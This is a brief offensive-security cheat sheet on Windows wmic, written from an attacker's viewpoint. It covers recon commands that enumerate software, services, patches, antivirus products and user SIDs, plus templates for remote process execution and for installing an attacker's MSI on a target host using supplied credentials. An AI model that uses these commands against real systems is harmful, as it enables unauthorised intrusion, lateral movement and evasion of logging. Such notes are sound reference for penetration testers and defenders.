The wmic command on Windows is extremely useful, but is also deprecated (because of its usefulness to attackers!). It can be used on Windows 10 21H1 and earlier. For later systems, PowerShell command-lets will need to be used instead (which increases the risk that activity will be logged).

• wmic product get name,version,vendor — list all installed software (but misses 32-bit applications installed on a 64-bit OS)
• wmic service get name,displayname,pathname,startmode — list all services
• wmic qfe get caption,description,hotfixid,installedon — list installed updates
• wimc service list brief — another way of listing services
• wmic service where "name like '$SERVICE_NAME'" get name,pathname — get information about a particular service
• wmic /namespace:\root\securitycenter2 path antivirusproduct — enumerate antivirus
• wmic useraccount get name,sid — Display SIDs for all (local) users

Remote process creation

wmic.exe /user:$TARGET_USER `
         /password:$TARGET_PASSWORD `
         /node:$TARGET_HOST `
    process call create "$SOME_COMMAND"

Install an MSI package

wmic.exe /user:$TARGET_USER `
         /password:$TARGET_PASSWORD `
         /node:$TARGET_HOST `
    product call install PackageLocation=$PATH_TO_ATTACKER_MSI